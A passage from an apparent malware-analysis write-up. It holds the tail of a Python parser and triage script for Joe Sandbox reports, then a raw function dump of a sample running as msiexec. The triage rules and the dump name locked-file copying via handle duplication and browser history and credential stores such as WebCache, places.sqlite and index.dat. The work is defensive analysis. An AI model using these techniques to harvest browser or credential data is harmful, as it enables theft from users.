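        if rec is None or not line.startswith("•"):
            continue
        body = line[1:].strip()
        if section == "APIs" and (m := API_RE.match(body)):
            rec["apis"].append(m.groupdict())
        elif section == "Strings" and (m := STR_RE.match(body)):
            rec["strings"].append({"text": m.group("text"), "xrefs": m.group("xrefs").split(", ")})
        elif section == "Memory Dump Source":
            rec["source"] = body
        elif section == "Similarity":
            key, _, val = body.partition(":")
            rec["similarity"][key.strip()] = val.strip()
    return records

# Triage heuristics are mine, not Joe Sandbox's: an API set that copies a file
# another process holds open (duplicate its handle, map it, write the copy out),
# and strings that name a browser cache or profile-folder store.
LOCKED_FILE_COPY = {"OpenProcess", "DuplicateHandle", "CreateFileMappingW", "MapViewOfFile", "WriteFile"}
STORE_MARKERS = ("WebCache", "Shell Folders")

def triage(records):
    findings = []
    for rec in records:
        names = {a["name"] for a in rec["apis"]}
        reasons = []
        if LOCKED_FILE_COPY <= names:
            reasons.append("copies a locked file via DuplicateHandle + file mapping")
        texts = [s["text"] for s in rec["strings"]] + rec["similarity"].get("String ID", "").split("$")
        if any(mk in t for t in texts for mk in STORE_MARKERS):
            reasons.append("references a credential/profile store path")
        if reasons:
            label = rec["similarity"].get("Opcode ID") or (rec["apis"][0]["ref"] if rec["apis"] else "?")
            findings.append((label[:16], reasons))
    return findings

def instruction_hashes(records):
    """Opcode ID -> Instruction Fuzzy Hash, the pair to diff against another sample's report."""
    return {r["similarity"]["Opcode ID"]: r["similarity"]["Instruction Fuzzy Hash"]
            for r in records if "Instruction Fuzzy Hash" in r["similarity"]}

# Constructed sample: three records copied from the report in its own layout; the
# first is cut off at a page boundary, and some lines have been trimmed for length.
SAMPLE_REPORT = r"""
Similarity
• String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
• Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
• Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
APIs
  • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
  • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
  • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
  • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
  • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
• CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
  • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
• DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• String ID:
• Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
• Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
APIs
  • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
• wcscpy.MSVCRT ref: 00414CFC
Strings
• Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
Similarity
• Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
"""

if __name__ == "__main__":
    for label, reasons in triage(parse_records(SAMPLE_REPORT)):
        print(label, "->", "; ".join(reasons))
```

Feed it the whole function dump of a report (the text under "Execution Graph" / function analysis) and the parser yields one dict per function; `triage` then lists the ones worth opening first, and `instruction_hashes` gives the Opcode ID to Instruction Fuzzy Hash map that can be set-intersected with the same map from a second sample's report to see which functions are shared between builds. The `partial` flag marks a record whose start lies before the text you pasted, so that its missing API list is not mistaken for a function that calls nothing.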
APIs
  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
• memset.MSVCRT ref: 00403A55
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
Strings
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
                                                                                                                                                                                                          • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                                                                                                                          • String ID: history.dat$places.sqlite
                                                                                                                                                                                                          • API String ID: 2641622041-467022611
                                                                                                                                                                                                          • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                                                                                                                                                          • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                                            • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                                            • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                                          • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00417627
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ErrorLast$File$PointerRead
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 839530781-0
                                                                                                                                                                                                          • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                                                                          • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileFindFirst
                                                                                                                                                                                                          • String ID: *.*$index.dat
                                                                                                                                                                                                          • API String ID: 1974802433-2863569691
                                                                                                                                                                                                          • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                                                                          • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                                                                                                                          • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ErrorLast$FilePointer
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1156039329-0
                                                                                                                                                                                                          • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                                                          • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                                          • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                                          • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$CloseCreateHandleTime
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3397143404-0
                                                                                                                                                                                                          • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                                                          • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                                          • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1125800050-0
                                                                                                                                                                                                          • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                                                          • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                                                          • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                                                                                                                                          • CloseHandle.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CloseHandleSleep
                                                                                                                                                                                                          • String ID: }A
                                                                                                                                                                                                          • API String ID: 252777609-2138825249
                                                                                                                                                                                                          • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                                                          • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                                                          • free.MSVCRT ref: 00409A31
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: freemallocmemcpy
• String ID:
• API String ID: 3056473165-0
• Opcode ID: a23d2a939ad00af3b28f9ed5364f909f34e6d2834532e54aeef847f11c675e41
• Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
• Opcode Fuzzy Hash: a23d2a939ad00af3b28f9ed5364f909f34e6d2834532e54aeef847f11c675e41
• Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
Strings
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID:
• String ID: d
• API String ID: 0-2564639436
• Opcode ID: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
• Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
• Opcode Fuzzy Hash: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
• Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: memset
• String ID: BINARY
• API String ID: 2221118986-907554435
• Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
• Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
• Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
• Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: _wcsicmp
• String ID: /stext
• API String ID: 2081463915-3817206916
• Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
• Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
• Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
• Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
APIs
  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
• GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
• CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
• String ID:
• API String ID: 2445788494-0
• Opcode ID: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
• Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
• Opcode Fuzzy Hash: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
• Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
APIs
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
• GetProcAddress.KERNEL32(?,00000000), ref: 00404453
• FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
• String ID:
• API String ID: 3150196962-0
• Opcode ID: 86234f6dcfe5183eb12d2d600ddfcc7b691cb690ca4801b5099eddac0042a321
• Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
• Opcode Fuzzy Hash: 86234f6dcfe5183eb12d2d600ddfcc7b691cb690ca4801b5099eddac0042a321
• Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
APIs
Strings
• failed to allocate %u bytes of memory, xrefs: 004152F0
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: malloc
• String ID: failed to allocate %u bytes of memory
• API String ID: 2803490479-1168259600
• Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
• Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
• Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
• Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
APIs
• memset.MSVCRT ref: 0041BDDF
• memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: memcmpmemset
• String ID:
• API String ID: 1065087418-0
• Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
• Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
• Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
• Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
APIs
  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
• GetStdHandle.KERNEL32(000000F5), ref: 00410530
• CloseHandle.KERNELBASE(?), ref: 00410654
  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
  • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
  • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
  • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
• String ID:
                                                                                                                                                                                                          • API String ID: 1381354015-0
                                                                                                                                                                                                          • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                                                                                                          • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 004301AD
                                                                                                                                                                                                          • memcpy.MSVCRT(000001A8,?,00000020,?,00000000,00000000,00443DCE,00000000,00000000,00000000,?,00445FAE,?), ref: 004301CD
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpymemset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1297977491-0
                                                                                                                                                                                                          • Opcode ID: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                                                                                                                                                                                          • Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                                                                                                            • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                                            • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                                            • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                                                                          • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2154303073-0
                                                                                                                                                                                                          • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                                                                          • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
